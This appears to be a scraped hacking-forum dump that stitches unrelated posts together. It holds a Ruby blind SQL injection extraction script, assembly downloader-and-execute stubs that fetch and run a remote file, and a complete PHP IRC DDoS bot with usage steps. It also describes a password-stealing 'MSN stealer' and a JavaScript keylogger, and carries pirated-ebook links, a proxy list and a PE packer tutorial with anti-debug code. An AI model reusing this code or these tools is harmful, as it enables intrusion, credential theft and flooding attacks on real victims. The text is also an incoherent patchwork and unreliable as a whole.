lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end

;Simple Downloader + Execute (1.50kb compiled) ;by iNs ;activespy.org include 'win32ax.inc' .code inizio: invoke URLDownloadToFile,NULL,"http://www.site.com/filetodownload.ext","C:\downloaded.txt",NULL,NULL ;download file invoke ShellExecute,0,0,"C:\downloaded.txt",0,0,SW_SHOW ;run downloaded file invoke ExitProcess,0 .end inizio Download file in TempPath (2kb compiled) : ;Simple Downloader + Execute ;Save file in TempPath ; by iNs ; activespy.org include 'win32ax.inc' .data TmpName db 'new.txt',0 Tmpdir rb 256d ;256chrs .code inizio: invoke GetTempPath,Tmpdir,Tmpdir ;get temppath invoke lstrcat,Tmpdir,TmpName ;append invoke lstrcpy,TmpName,Tmpdir ;copy invoke URLDownloadToFile,NULL,"http://www.site.org/a.txt",TmpName,NULL,NULL ;download file in temppath invoke ShellExecute,0,0,TmpName,0,0,SW_SHOW ;run downloaded file invoke Sleep,3000 ;sleep 3 seconds invoke ExitProcess,0 ;quit .end inizio

Use: - Open mIRC (download: mirc.com) - Upload php_ddos_bot.php to your web server - Bot will join #yourchannel - PM the bot saying "ddos-udp IPHERE" - Enjoy. <?php /* PHP DDoS Bot Version 1.0 */ $server="1.3.3.7"; $Port="6667"; $nick="bot-";$willekeurig; $willekeurig=mt_rand(0,3); $nicknummer=mt_rand(100000,999999); $Channel="#WauShare"; $Channelpass="ddos"; $msg="Farewell."; set_time_limit(0); $loop = 0; $verbonden = 0; $verbinden = fsockopen($server, $Port); while ($read = fgets($verbinden,512)) { $read = str_replace("\n","",$read); $read = str_replace("\r","",$read); $read2 = explode(" ",$read); if ($loop == 0) { fputs($verbinden,"nick $nick$nicknummer\n\n"); fputs($verbinden,"USER cybercrime 0 * :woopie\n\n"); } if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); } if ($read2[1] == 251) { fputs($verbinden,"join $Channel $Channelpass\n"); $verbonden++; } if (eregi("bot-op",$read)) { fputs($verbinden,"mode $Channel +o $read2[4]\n"); } if (eregi("bot-deop",$read)) { fputs($verbinden,"mode $Channel -o $read2[4]\n"); } if (eregi("bot-quit",$read)) { fputs($verbinden,"quit :$msg\n\n"); break; } if (eregi("bot-join",$read)) { fputs($verbinden,"join $read2[4]\n"); } if (eregi("bot-part",$read)) { fputs($verbinden,"part $read2[4]\n"); } if (eregi("ddos-udp",$read)) { fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n"); $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30); if (!$fp) { //echo "$errstr ($errno)<br>\n"; //troep exit; } else { $char = "a"; for($a = 0; $a < 9999999999999; $a++) $data = $data.$char; if(fputs ($fp, $data) ) fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n"); else fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n"); } } if (eregi("ddos-tcp",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n"); $server = $read2[4]; $Port = $read2[5]; for($sockets = 0; $sockets < $read2[6]; $sockets++) { $verbinden = fsockopen($server, $Port); } } if (eregi("ddos-http",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n"); $Webserver = $read2[4]; $Port = $read2[5]; $Aanvraag = "GET / HTTP/1.1\r\n"; $Aanvraag .= "Accept: */*\r\n"; $Aanvraag .= "Accept-Language: nl\r\n"; $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n"; $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $Aanvraag .= "Host: $read2[4]\r\n"; $Aanvraag .= "Connection: Keep-Alive\r\n\r\n"; for($Aantal = 0; $Aantal < $read2[6]; $Aantal++) { $DoS = fsockopen($Webserver, $Port); fwrite($DoS, $Aanvraag); fclose($DoS); } } $loop++; } ?>

Ubuntu on a Dime: The Path to Low-Cost Computing Paperback: 280 pages Publisher: Apress; 1 edition (June 8, 2009) Language: English ISBN-10: 1430219726 ISBN-13: 978-1430219729 Format: PDF Description: You know that Ubuntu software costs nothing. Now you want the PC system that costs as little as possible and runs Ubuntu and OS applications without complaints and calls to tech support. So you spend your hard–earned dollars on the hardware only and have your own optimized Ubuntu PC. This is the book that will show you how to get what you need without wreaking havoc on your finances. Put together the parts to make a great work computer for little cost. Packed with the practical, hands–on guidance and technical know–how that you’ve come to expect from Apress, Ubuntu on a Dime takes you on a tour of the very best, but low–cost hardware, while only using zero–cost software in each of the many categories that matter to the typical PC user. You’ll learn how to find the best and cheapest hardware, and how to put it together to make a working PC. Learn to edit photos on the Internet without having to install any software at all. Find out where to get a free office suite for word processing and spreadsheet work. Whatever your need, James Kelly, best–selling technology author, guides you through the exciting and often confusing world of zero–cost computing. This book Takes you step–by–step through a PC build Tells you what you need to install to have a fantastic work computer without spending a dime Saves you money by showing you how to meet your computing needs Saves you time by pointing you directly to the best free software Saves you work by illustrating the most commonly performed tasks with each zero–cost software Gives you choices and the ability to make your own decisions for your own needs and requirements Before you go buy that $900 dollar computer and that $400 office suite—or worse, before you “borrow” it from work—stop! Let this inexpensive book show you how to save hundreds of dollars in expensive software, and never depend on the big PC providers and their tech support again. Learn all about cheap, but fast hardware, find out about the free tools that the digerati use to make their lives better, and stop paying out the nose. Don't spend a dime! What you’ll learn Source, buy, and put together the best hardware to make a cheap PC optimized for Ubuntu Linux. Find and install the best zero–cost software available. Learn about software as a service and take advantage of photo editing, calendaring, e-mail, and other functionality delivered at no cost via the Web. Harness the power of OpenOffice and Google Apps for your word processing, spreadsheet, presentation needs. Communicate with your friends through zero–cost voice calls, e-mail, and instant–messaging. Establish a presence on the Web through blogs and social networking sites such as Facebook. Download: http://www.file2box.com/htebxx7uuuiy Ubuntu Linux Secrets Paperback: 840 pages Publisher: Wiley (April 13, 2009) Language: English ISBN-10: 0470395087 ISBN-13: 978-0470395080 Format: PDF Description: The everyday Linux user can easily get overwhelmed by the complexity of the new software that exists when creating an Ubuntu system. This book covers the basics of creating a new system from scratch and explains what software is installed. You’ll take a tour of installing the Ubuntu Linux distribution system in most environments, including nontraditional situations such as dual-boot and text-based installations. Plus, clear explanations of each of the installed applications show you how to get the most out of each application, rather than simply using them as they exist. Download: http://www.file2box.com/e2rgzswf67ii Ubuntu Pocket Guide and Reference: A concise companion for day-to-day Ubuntu use Paperback: 166 pages Publisher: CreateSpace (January 19, 2009) Language: English ISBN-10: 1440478295 ISBN-13: 978-1440478291 Format: PDF Description: Ubuntu Pocket Guide and Reference is a compact yet comprehensive guide for everyday Ubuntu use, written by the award-winning and best-selling Ubuntu author Keir Thomas. First, you'll learn about installation--getting Ubuntu onto your computer--after which you'll learn how to configure your computer's hardware. Following this, you'll be introduced to the Ubuntu desktop, and the tricks and techniques of efficient day-to-day usage. The book then describes the highways of the Ubuntu filesystem, and gives a full run-down of the Ubuntu file manager. Next, the command-line is tackled in-depth, after which software management is explained. Finally, system security is described. Appendixes provide a glossary, and a guide to technical documentation. Written for anybody switching to Ubuntu, particularly Windows users, Ubuntu Pocket Guide and Reference assumes zero Linux knowledge and conveys expert knowledge. Download: http://uploading.com/files/EKSFHYNM/9781440478291-1440478295.rar.html Pro Ubuntu Server Administration Paperback: 424 pages Publisher: Apress; 1 edition (December 2, 2008) Language: English ISBN-10: 1430216220 ISBN-13: 978-1430216223 Format: PDF Description: Pro Ubuntu Server Administration teaches you advanced Ubuntu system building. After reading this book, you will be able to manage anything from simple file servers to multiple virtual servers to high–availability clusters. This is the capstone volume of the Apress Ubuntu trilogy that includes Beginning Ubuntu Linux, Third Edition and Beginning Ubuntu Server LTS Administration: From Novice to Professional, Second Edition. You will be able to make Ubuntu technology shine in a Fortune–500 environment and let Ubuntu server become the backbone of your infrastructure. Topics covered include Performance monitoring and optimization High–availability clustering Advanced LDAP integrated networking What you’ll learn Monitor Ubuntu Server software and the hardware it is running on. Make Ubuntu Server fly by careful optimization. Learn how to craft high–availability clusters. Ease your way into large–scale LDAP networking. Acquire the skills to adjust Ubuntu Server to the security needs of a Fortune–500 environment. Run your own Ubuntu application server. Download: http://uploading.com/files/9SAV2IQS/9781430216223-1430216220.rar.html Ubuntu Linux Toolbox: 1000+ Commands for Ubuntu and Debian Power Users Publisher: Wiley Language: English ISBN: 0470082933 Paperback: 332 pages Data: November 28, 2007 Format: PDF Description: Aimed squarely at aspiring Linux power users and professional administrators, the Ubuntu Linux Toolbox offers more than 1000 examples of useful Linux command lines. This compact, handy reference is made to carry with you, whether you are maintaining hundreds of Linux systems or just want to dig beneath the surface of your Ubuntu desktop system. This is the Linux reference book you need to step up to the next level. Download: http://www.paid4share.net/file/4056/0470082933-rar.html Linux Bible 2009 Edition: Boot up Ubuntu, Fedora, KNOPPIX, Debian, openSUSE, and more Paperback: 888 pages Publisher: Wiley; Pap/Dvdr/C edition (January 14, 2009) Language: English ISBN-10: 0470373679 ISBN-13: 978-0470373675 Format: PDF Description: As the ultimate resource on the basics of the Linux desktops, servers, and programming tools, this book is written by the ultimate author on all things Linux. This transition resource is ideal if you are making the move from Windows or Macintosh to using Linux as your desktop system, and explains the Linux technology, offers detailed installation instructions, and includes step-by-step descriptions of key desktop and server components. You’ll relish the in-depth descriptions that will help you choose the best Linux distribution to suit your needs. Download: http://www.file2box.com/u6bkgeldn72x Pro Linux System Administration Paperback: 1080 pages Publisher: Apress; 1 edition (June 22, 2009) Language: English ISBN-10: 1430219122 ISBN-13: 978-1430219125 Format: PDF Description: We can all be Linux experts, provided we invest the time in learning the craft of Linux administration. Pro Linux System Administration makes it easy for small to medium–sized businesses to enter the world of zero–cost software running on Linux and covers all the distros you might want to use, including Red Hat, Ubuntu, Debian, and CentOS. Authors, and systems infrastructure experts James Turnbull, Peter Lieverdink, and Dennis Matotek take a layered, component–based approach to open source business systems, while training system administrators as the builders of business infrastructure. If you want to implement a SOHO or SMB Linux infrastructure, Pro Linux System Administration clearly demonstrates everything you need. You’ll find this book also provides a solid framework to move forward and expand your business and associated IT capabilities, and you’ll benefit from the expertise and experienced guidance of the authors. Pro Linux System Administration covers An introduction to using Linux and free and open source software to cheaply and efficiently manage your business A layered model that allows your infrastructure to grow with your business Easy and simple–to–understand instructions including configurations, examples, and extensive real–world hints and tips Download: http://www.file2box.com/0i51y2fm5xur

Nu cred, incearca si tu mai multe chestii: Pune html-ul intr-un iframe si incearca sa scrii in pagina cu iframe sau altele... Nu am testat.

Logic. Keypress-urile trebuie sa le primeasca browserul, js-ul captureaza acestea si le trimite prin AJAX la PHP loggerul care le scrie in fisier.

Blowfish: http://www.2shared.com/file/7104480/65a1678f/clsBlowfish.html DES: http://www.2shared.com/file/7104489/1c7ddf2b/clsDES.html Gost: http://www.2shared.com/file/7104491/bbd6658/clsGost.html RC4: http://www.2shared.com/file/7104496/95d9f3fb/clsRC4.html Rijndael: http://www.2shared.com/file/7104500/acba87b0/clsRijndael.html Serpent: http://www.2shared.com/file/7104509/d5663f14/clsSerpent.html Skipjack: http://www.2shared.com/file/7104514/b2cc72e8/clsSkipjack.html TEA: http://www.2shared.com/file/7104518/bb7a3ec3/clsTEA.html Twofish: http://www.2shared.com/file/7104521/e98bd5a4/clsTwofish.html + Huffman ( Compression algorithm ): http://www.2shared.com/file/7104536/6ef47146/clsHuffman.html Hash algorithms: MD5: http://www.2shared.com/file/7104551/a6ca4363/clsMD5.html SHA: http://www.2shared.com/file/7104557/4fa9e656/clsSHA.html SHA256: http://www.2shared.com/file/7104554/d6a0b7ec/clsSHA256.html ALL: http://www.a1vbcode.com/download.asp?ID=1438

File Cloner v1.0 Copy from one file to another: - Version Info - Icon - File Size (only take result when source size is bigger than dest. file size) - Date/time of last modification If you find any bug please report it to me! Tested on MS Windows XP and Windows 2003 Server. I am waiting for testing and comments. Sample pictures: - before clone: -after clone: Download: http://mo4x.ovh.org/file_cloner.zip Mirror: http://www.2shared.com/file/7104365/8e07a80b/file_cloner.html Regards, mo4x

TGS msn stealer! by SqUeEzEr It's a MSN stealer with only 8,50KB of code UNCOMPRESSED (and the settings are even crypted xD) It emails you the stored passwords of Windows Live Messenger. [usage] You have to open Builder.exe and fill in your information and press patch. Stub.exe should be in the same folder. Be sure you use a valid GMAIL account, otherwise you will get a error message. Download: http://www.2shared.com/file/7104327/4650c23/Stealer.html

Mate sucks... Baga si tu ceva care nu are legatura cu mate. Mai e pana sa inceapa scoala.

194.212.94.23:8000 212.113.5.2:80 212.96.165.178:3128 222.240.141.4:8080 218.56.64.210:3128 200.165.90.110:8080 201.89.168.155:8080 201.91.0.9:3128 202.116.160.89:80 202.131.94.58:808 200.74.156.108:8080 202.63.97.35:8080 210.51.184.62:80 222.124.194.228:8080 222.124.2.106:8080 222.127.147.83:8080 60.191.241.38:8088 217.150.32.86:80 61.147.120.247:8080 58.68.125.75:80 61.186.94.152:3128 81.174.70.141:32123 80.249.185.2:3128 64.94.90.22:80 67.69.254.245:80 82.145.197.249:8080 211.239.124.67:6188 97.65.164.215:8080 200.168.234.1:8080 200.168.234.10:8080 200.168.234.99:8080 203.202.255.110:8080 211.90.22.106:8088 219.150.228.182:1080 195.139.235.200:80 222.215.71.132:1080 218.56.64.210:8080 202.129.189.66:8080 203.148.85.154:8080 203.160.1.103:80 203.160.1.121:80 203.160.1.94:80 64.76.22.106:8080 64.76.22.126:8080 220.227.250.254:8080 61.178.74.39:1080 67.69.254.250:80 79.127.144.2:8080 117.102.94.190:3128 203.199.215.115:8080 118.175.15.34:8080 219.93.178.162:3128 41.196.183.58:80 201.198.34.214:8080 189.89.16.82:3128 190.144.127.202:3128 201.53.63.168:3128 218.75.100.114:8080 202.133.82.120:8080 219.101.35.83:3128 64.76.22.108:8080 67.69.254.246:80 121.12.249.207:1080 203.112.205.194:80 74.53.185.131:8080 86.101.185.98:8080 74.86.24.76:3128 74.92.229.74:8089 81.180.75.142:8080 81.208.114.227:8080 114.127.246.36:80 195.229.62.157:8080 210.5.71.130:8080 211.162.78.178:80 146.83.8.31:8080 148.75.13.143:8080 202.131.98.165:80 202.148.31.170:3126 196.213.208.150:80 202.44.4.85:8081 200.249.150.55:3128 200.41.230.105:3128

Make your owner PE Protector Part 1: Your first EXE Protector Download source files - 128 Kb Download demo project - 100 Kb Preface This article was written to provide the better understanding to people who do not have any experience in this field. I am not going to describe about PE structure, so I think it was explained enough in Matt Pietrek's articles in MSDN. I strongly recommend to read his article before continuing to read this article if you don't have any previous experience with PE structure. You could find useful the relevant reference link at the end of article. This article will appear in three parts: Your first EXE Protector This part will describe how to make a powerful EXE protector and packer by using Visual C++ Win32 Programming. Support OCX, DLL, and SCR This part will introduce to include other PE type in additional to EXE file type. It will explain some tricks which you should know for OCX and DLL protecting. Use Cryptography API This part will demonstrate how to use Microsoft Cryptography API function to encrypt and decrypt PE section information. This article contains yoda's protector source from version 1.01 to 1.03. It is first time people can look at its source after six month of appearance on web. It is based on [6] yoda's Crypter assembly source by Danilo Bzdok and compression source from [7] UPX library by Markus F.X.J. Oberhumer & Laszlo Molnar and [9] aPLib compression library by Joergen Ibsen. Thus, we should appreciate them for helping me to create this tool. I also should be grateful to people for trying and testing it on different windows version around the world. I think this article will be a small present to all people who involve and assist to make yoda's protector. Contents Introduction A short aspect about PE Structure Open PE files Verify if PE file is valid Make Extra Section Pack and Crypt Sections Built Import Table Directory Reload Import Table and API Redirection Anti-debug methods Eliminate unnecessary data Sample code Conclusion References Introduction The Portable Executable format is standard format under Microsoft Windows NT® operating system. It contains information for code, data, resource, dynamic link libraries importation. It is modifiable by using recent powerful debuggers such as OllyDbg or SoftICE with a little knowledge about assembly language. It causes to waste time of software development companies to obtain money for their productions. Therefore, they are led to purchase the tool like EXE protector to prevent from illegal copy. My idea is what will happen if every person has owner EXE protector. Cracker person will face different EXE protector with different methods. Thus, I think every of us can have their owner EXE protector. A short aspect about PE Structure The Portable Executable includes information for the MS-DOS, the Windows NT, and Sections. This information is provided for Windows Operating System to allocate memory, import dynamic link libraries, and perform code. Table-1 MS-DOS informationIMAGE_DOS_HEADERMS-DOS Stub ProgramWindows NT informationPE Signature ("PE")IMAGE_FILE_HEADERIMAGE_OPTIONAL_HEADERSections informationIMAGE_SECTION_HEADER[0] ... IMAGE_SECTION_HEADER[n] SECTION[0] ... SECTION[n] You can find more about PE file format in [1] "Microsoft Portable Executable and Common Object File Format Specification". Matt Pietrek clarifies it enough in [2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", and [3a/b] "An In-Depth Look into the Win32 Portable Executable File Format". Moreover, PEView [4] by Wayne J. Radburn will help you to find all aspects about PE file format. http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/peview.gifFigure-1 There are all requirement data structures for PE file format in included <winnt.h> file inside your Visual C++. IMAGE_DOS_HEADER, IMAGE_NT_HEADERS, IMAGE_SECTION_HEADER structures represent all you need to work with PE file format. The relevant information for these structures could be found in [5] MSDN library. Open PE files We have to load PE file format to memory for working with its information. Some Windows API function will help us do it very easy: ''CreateFile(), GetFileSize(), GlobalAlloc(), ReadFile(), CloseHandle()''. I make a class to work with PE files. It helps me to open files and put DOS header, NT headers, Section Headers, and Sections into separate places in memory and then rebuild all as form as new PE files. class PEStructure { private: DWORD ReservedHeaderSize; DWORD ReservedHeaderRO; public: DWORD dwRO_first_section; IMAGE_DOS_HEADER image_dos_header; char *reservedheader; IMAGE_NT_HEADERS image_nt_headers; IMAGE_SECTION_HEADER image_section_header[MAX_SECTION_NUM]; char *image_section[MAX_SECTION_NUM]; void OpenFileName(char* FileName); void UpdateHeaders(BOOL bSaveAndValidate); void UpdateHeadersSections(BOOL bSaveAndValidate); void Free(); }; ''OpenFileName()'' will open PE files to place in ''image_dos_header, reservedheader, image_nt_headers, image_section_header[]'', and ''image_section[]''. All PE structures will abstract by this function in my tool. void PEStructure::OpenFileName(char* FileName) { hFile=CreateFile(FileName, GENERIC_READ, FILE_SHARE_WRITE | FILE_SHARE_READ, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if(hFile==INVALID_HANDLE_VALUE) { ShowErr(FileErr); return; } dwFsize=GetFileSize(hFile,0); if(dwFsize == 0) { CloseHandle(hFile); ShowErr(FsizeErr); return; } dwOutPutSize=dwFsize+IT_SIZE+DEPACKER_CODE_SIZE+ALIGN_CORRECTION; pMem=(char*)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT,dwOutPutSize); if(pMem == NULL) { CloseHandle(hFile); ShowErr(MemErr); return; } ReadFile(hFile,pMem,dwFsize,&dwBytesRead,NULL); CloseHandle(hFile); CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderRO=sizeof(IMAGE_DOS_HEADER); ReservedHeaderSize=image_dos_header.e_lfanew-sizeof(IMAGE_DOS_HEADER); reservedheader=new TCHAR[ReservedHeaderSize]; CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); UpdateHeadersSections(TRUE); } Verify if PE file is valid It is important to verify file is a Win32 Portable Executable file by checking ''e_magic'' of ''image_dos_header'' and Signature of ''image_nt_header'' to prevent of unpredictable fault. if(PEfile.image_dos_header.e_magic!='ZM') { GlobalFree(pMem); CloseHandle(hFile); if(MakeBackup) DeleteFile(szFnameBackup); ShowErr(PEErr); return; } if(PEfile.image_nt_headers.Signature!='EP') { GlobalFree(pMem); CloseHandle(hFile); if(MakeBackup) DeleteFile(szFnameBackup); ShowErr(PEErr); return; } Make Extra Section There is a trick inside yoda's Protector to create extra section for protection and unpacking purposes. Visual C++ aids it to make this extra part without using of assembler compiler and linker. If you look at PE_LOADER_CODE() subroutine inside the ''CryptStuff.cpp'' you will find what I am talking about. This is same as the method that was done by Danilo Bzdok in his [6] yoda's Crypter. Of course, he did it only by using assembly language in MASM32 without any high level language. I made ''GetFunctionRVA(), GetFunctionSize()'' and CopyFunction()'' to rob code from PE_LOAD_CODE() and use it to create additional section for target PE file. DWORD GetFunctionRVA(void* FuncName) { void *_tempFuncName=FuncName; char *ptempFuncName=PCHAR(_tempFuncName); DWORD _jmpdwRVA,dwRVA; CopyMemory(&_jmpdwRVA,ptempFuncName+1,4); dwRVA=DWORD(ptempFuncName)+_jmpdwRVA+5; return(dwRVA); } DWORD GetFunctionSize(void* FuncName) { DWORD dwRVA=GetFunctionRVA(FuncName); char* pFuncBody=PCHAR(dwRVA); UCHAR _temp; bool notEnd=TRUE; char *DepackerCodeEnd=new TCHAR[10]; DWORD l=0; do { CopyMemory(&_temp,pFuncBody+l,1); if(_temp==0xC3) { CopyMemory(DepackerCodeEnd,pFuncBody+l+0x01,10); DepackerCodeEnd[9]=0x00; if(strcmp(DepackerCodeEnd,"ETGXZKATZ")==0) { notEnd=FALSE; } } l++; }while(notEnd); return(l); } ''GetFunctionRVA()'' will seek to Relative Virtual Address of specific subroutine to use by ''GetFunctionSize()'' and ''CopyFunction()''. ''GetFunctionSize()'' will return the size of target routine to be exploited by CopyFunction(). It seeks a key word ("ETGXZKATZ") to calculate routine size. Finally, ''CopyFunction()'' is a complete routine to steal all code from PE_LOADER_CODE() subroutine to place in packed PE file. char* CopyFunction(void* FuncName) { DWORD dwRVA=GetFunctionRVA(FuncName); DWORD dwSize=GetFunctionSize(FuncName); char* pFuncBody=PCHAR(dwRVA); char* filebuff=new TCHAR[dwSize+1]; CopyMemory(filebuff,pFuncBody,dwSize); return(filebuff); } This method can illuminate in the following code: char *pDepackerCode; DWORD DEPACKER_CODE_SIZE; : DEPACKER_CODE_SIZE=GetFunctionSize(PE_LOADER_CODE); pDepackerCode=new TCHAR[DEPACKER_CODE_SIZE]; pDepackerCode=CopyFunction(PE_LOADER_CODE); : void PE_LOADER_CODE() { _asm { //-------------------------------------------------- //---------- START OF THE PE LOADER CODE ----------- DepackerCode: : : : DepackerCodeEND: RET //"ETGXZKATZ" <<-- KEY WORD INC EBP //'E' PUSH ESP //'T' INC EDI //'G' POP EAX //'X' POP EDX //'Z' DEC EBX //'K' INC ECX //'A' PUSH ESP //'T' POP EDX //'Z' } } Pack and Crypt Sections UPX compressor source [7] code is an alternative choice to pack sections of PE files. I use [8] LZO data compression library by Markus F.X.J. Oberhumer to pack code and data section. Polymorphism encryption and decryption method [6] by Danilo Bzdok is simple and good enough to crypt PE section by some modification in C++ language as you see inside ''EncryptBuff()'' and ''DecryptBuff()'' in ''PER.CPP''. This protector separates Sections in different allocation parts of memory. Afterwards it packs and crypts part of sections by CompressPE() and CryptPE(). //------ ENCRYPT THE SECTIONS ----- // generate PER PEfile.UpdateHeadersSections(TRUE); SecEncryptBuff=new TCHAR[sEC_PER_SIZE]; SecDecryptBuff=new TCHAR[sEC_PER_SIZE]; MakePER(SecEncryptBuff,SecDecryptBuff,SEC_PER_SIZE); CopyMemory(pDepackerCode+dwRO_SEC_DECRYPT, SecDecryptBuff, SEC_PER_SIZE); // encrypt ! CompressPE(pMem); CryptPE(pMem); RemoveSectionNames(pMem); newsection.Misc.VirtualSize=DepackCodeVirtualSize+0x2000; PEfile.image_section_header[PEfile.image_nt_headers.FileHeader.NumberOfSections-1] .Misc.VirtualSize = newsection.Misc.VirtualSize; PEfile.UpdateHeadersSections(FALSE); //--------------------------------- LZO data compression library [8] has compressor source in C++ and also decompressor source in both C++ and assembly. Hence, we have all sources to pack in high level language and unpack in low level language. I used ''lzo1x_999_compress_level()'' from LZO library to compress sections inside ''CompressPE()'' and its assembly source ''lzo1f_decompress_asm_fast_safe()'' to decompress sections ''inside _DecompressPE()'' in assembly source of ''PE_LOADER_CODE()''. It is important to pay attention to image_nt_headers.OptionalHeader.SectionAlignment and image_nt_headers.OptionalHeader.FileAlignment to prevent of Win32 incompatible file error in Windows version above Windows 98. Variables in IMAGE_SECTION_HEADER should be adapted to file-alignment and section- alignment. I reserved ''UpdateHeadersSections()'' function to retrieve and rebuilt all PE file format structures. void PEStructure::UpdateHeadersSections(BOOL bSaveAndValidate) { DWORD i; if(bSaveAndValidate)//TRUE = data is being retrieved { DWORD SectionNum = PEfile.image_nt_headers .FileHeader.NumberOfSections; CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderSize = image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER); if((ReservedHeaderSize&0x80000000)==0x00000000) { CopyMemory(reservedheader, pMem+ReservedHeaderRO, ReservedHeaderSize); } CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); CopyMemory(&image_section_header, pMem+dwRO_first_section, SectionNum*sizeof(IMAGE_SECTION_HEADER)); for(i=0;i< SectionNum;i++) { image_section = (char*)GlobalAlloc( GMEM_FIXED | GMEM_ZEROINIT, PEAlign(image_section_header.SizeOfRawData, PEfile.image_nt_headers.OptionalHeader.FileAlignment)); CopyMemory(image_section, pMem + image_section_header.PointerToRawData, image_section_header.SizeOfRawData); } } else//FALSE = data is being initialized { DWORD SectionNum = PEfile.image_nt_headers .FileHeader.NumberOfSections; CopyMemory(pMem, &image_dos_header,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderSize=image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER); if((ReservedHeaderSize&0x80000000)==0x00000000) { CopyMemory(pMem + ReservedHeaderRO, reservedheader, ReservedHeaderSize); } CopyMemory(pMem+image_dos_header.e_lfanew, &image_nt_headers, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); CopyMemory(pMem+dwRO_first_section, &image_section_header, SectionNum*sizeof(IMAGE_SECTION_HEADER)); for(i=0;i< SectionNum;i++) { CopyMemory(pMem+image_section_header.PointerToRawData, image_section, image_section_header.SizeOfRawData); } } } Built Import Table Directory PE unpack section need to import two essential API functions to load dynamically all other API functions in Run-time load. LoadLibraryA() and GetProcAddress() from Kernel32.dll are vital function to import other API function with some tricky methods. AssembleIT() is reserved to undertake this task. We should change the import table address and size for turning to new import table directory inside extra section. To retrieve the old import table, it has to reload and rebuild import table directory in the next step to perform program code. Loader section use LoadLibraryA() and GetProcAddress() to seek relative virtual address of importation function of dynamic link libraries. Table-2 Import Table Address -> "Kernel32.dll", 0x00 LoadLibrary_RVA GetProcessAddres_RVA 0x00,0x00 LoadLibrary_RVA -> 0x00,0x00,"LoadLibraryA" GetProcessAddres_RVA -> 0x00,0x00,"GetProcessAddress" Reload Import Table and API Redirection It is important to protect import table directory from reverse engineering process. Danilo Bzdok has used technical methods to destroy import thunk data and crypt import information in [6] yoda's Crypter. This part is retrievable again by loader code section. I applied his methods in my PE Protector with bringing some part of code to C and remind other part in assembly. ''ProcessOrgIT()'' provide all we need to do our purpose. In loader section, ''INIT_IMPORT_TABLE()'' routine implements our point about API redirection and Import table rebuilt. Anti-debug methods PE Protector should able to detect if program debugs and prevent from debugging. OllyDbg and SoftICE are two important debuggers that can bypass many tricks which cause to halt debuggers. However, I should introduce some simple methods to detect debuggers. I know all of these methods do not have any effect in recently additional plug-ins for mentioned debuggers. 1. IsDebuggerPresent Windows API: ''IsDebuggerPresent()'' will return none zero value whenever the current process is running in the context of a debugger. 2. SoftICE detection: It can find SoftICE debugger by check if ''NTICE'' driver in windows NT and ''SICE'' driver in windows 98 are active . if(CreateFile( "\\\\.\\NTICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE) { There is SoftICE NT on your system; } if(CreateFile( "\\\\.\\SICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE) { There is SoftICE98 on your system; } 3. Probe Processes: Some time it needs to search for specific process or isolates to specially process. It was demonstrated how finding parent process and check if it is ''EXPLORER.EXE'' and killing all parent process except Explorer windows in sample source code. There are both C++ and assembly code inside ''CryptStuff.CPP'' to illuminate this task. void GetFileNameFromPath(char* szSource) { char *szTemp=strrchr(szSource,'\\'); if(szTemp!=NULL) { szTemp++; DWORD l=DWORD(strlen(szTemp))+1; CopyMemory(szSource,szTemp,l); } } void AntiDebug() { char lpszSystemInfo[MAX_PATH]; HANDLE hSnapshot=NULL; DWORD 